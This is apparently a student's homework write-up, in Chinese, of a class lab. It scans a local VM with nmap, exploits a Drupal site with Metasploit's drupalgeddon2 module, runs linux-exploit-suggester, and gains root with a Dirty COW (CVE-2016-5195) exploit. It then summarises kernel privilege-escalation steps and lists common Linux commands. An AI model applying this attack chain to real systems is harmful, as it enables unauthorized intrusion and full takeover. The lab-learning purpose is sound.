第十次作业

一、课上提权案例复现

首先打开test虚拟机,nmap扫描网段,找到案例的ip,这个80端口的ip就是目标ip

#namp 192.168.111.128/24
#namp -T4 1-65535 192.168.111.131

在这里插入图片描述
浏览器打开可以看到案例的网页,进一步扫描找到目标开发的端口:1898
在这里插入图片描述在IP后加上“:1898”可以打开登录页面,通过Wappalyzer插件可以发现内容管理系统是:Drupal
在这里插入图片描述
下面使用msf提权。首先打开msf服务,搜索Drupal的漏洞
在这里插入图片描述
这里我使用了日期较新的“unix/webapp/drupal_drupaldeddon2”提权模块,设置host和port参数,执行“run”进入工具载荷“meterpreter”

#use exploit /unix/webapp/drupal_drupaldeddon2
#set rhosts 192.168.111.131
#set rport 1898
#run

在这里插入图片描述
输入“getuid”命令可以查看权限,目前是www-data,不是root权限。输入“shell”进入目标机的cmd shell。输入linux的常用命令可以查看用户和系统信息。下面可以看到很多具体信息
在这里插入图片描述
将下载的针对提权的扫描脚本(本次选择“linux-exploit-suggester”)的压缩包复制到kali桌面上并解压。然后退出shell,返回到meterpreter里将脚本“linux-exploit-suggester.sh”上传到目标的/tmp,同时更名为hh.sh。

#exit
#upload home/kali/Desktop/linux-exploit-suggester-master/linux-exploit-suggester.sh /tmp/hh.sh

在这里插入图片描述
输入cd /tmpls -la,就可以看到里面已经有hh.sh文件了
在这里插入图片描述
这里需要改一下这个文件的权限
输入查看

#chmod +x hh.sh
#ls -al

在这里插入图片描述
使用“ls -al”查看权限添加成功后,输入”./hh.sh“执行脚本
在这里插入图片描述
选择找到的漏洞“CVE-2016-5195”,去网站“https://github.com/nomi-sec/PoC-in-GitHub/blob/master/2016/CVE-2016-5195.jsons”找到该漏洞的EXP下载。
在这里插入图片描述
下载到桌面,输入unzip CVE-2016-5195-master.zip解压
在这里插入图片描述
退出shell,返回到meterpreter里将脚本dcow.cpp上传到目标的/tmp,同时更名为ggbond.cpp。
在这里插入图片描述
进入shell,进入tmp目录查看文件,确认脚本上传成功。

#shell
#cd /tmp
#ls -al

在这里插入图片描述
编译文件,查看编译后的文件ggbond。运行编译文件,输入密码“dirtyCowFun“获得root权限
在这里插入图片描述
可以看到提权成功

二、总结Linux内核提权利用步骤

  1. 扫描网段,以发现目标主机。可用nmap等工具进行主机发现。
    2. 信息收集,查找是否存在RCE漏洞。可用浏览器对目标主机进行搜索,利用插件工具对网页进行分析,可从代码类型,使用的数据库、内存管理等系统版本入手。
    3. 获取到目标系统内核信息及版本信息。可借助msf破解RCE漏洞,拿到shell权限并执行命令获取目标主机的内核信息等。
    4. 根据内核版本获取其对应的漏洞以及EXP。可通过搜索或借助工具进行查找。
    5. 将漏洞的文件上传到目标主机(可通过前面拿到的shell权限进行上传),修改文件权限并执行。
    6. 使用找到的EXP对目标系统发起攻击,完成提权操作。成功的内核利用通常会以root命令提示符的形式为攻击者提供对目标系统的超级用户访问权限。

三、总结Linux常用命令

pwd:显示当前工作目录的路径
touch:创建空文件或更新文件的时间戳
grep:在文件中搜索指定文本
mount/umount:挂载和卸载文件系统
top/htop:显示系统资源的实时使用情况和进程信息
echo:将文本输出到标准输出
uname:显示系统信息
zip/unzip:用于压缩和解压zip文件
history:查看命令历史记录
lsblk/fdisk:查看磁盘分区信息和管理磁盘
dd:用于复制和转换文件
stat:显示文件或目录的详细信息
lsb_release -a/cat /etc/os-release:查看ubuntu版本
cat /proc/version/uname –a :看内核版本
cat /etc/group:查看分组
adduser:增加用户
usermod -g:修改用户分组
find / -name 文件名: 以文件名查找文件
ip addr: 查看ip地址
ifconfig :查看当前网卡
lshw -c network | grep serial:查看MAC地址
netstat -rn:查看路由
df -h: 磁盘挂载情况
df -i :查看每个硬盘分区的inode总数和已经使用的数量
vi 文件名: 使用vi编辑器编辑文件
cat 文件名: 查看文件内容
cp/mv 源文件路径 目标源文件路径 :复制/移动文件
cd/mkdir/rm 目录路径 :切换/创建/删除目录
ls: 查看目录中的文件
chmod +/- x 文件名 :给文件增加/减少执行权限

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值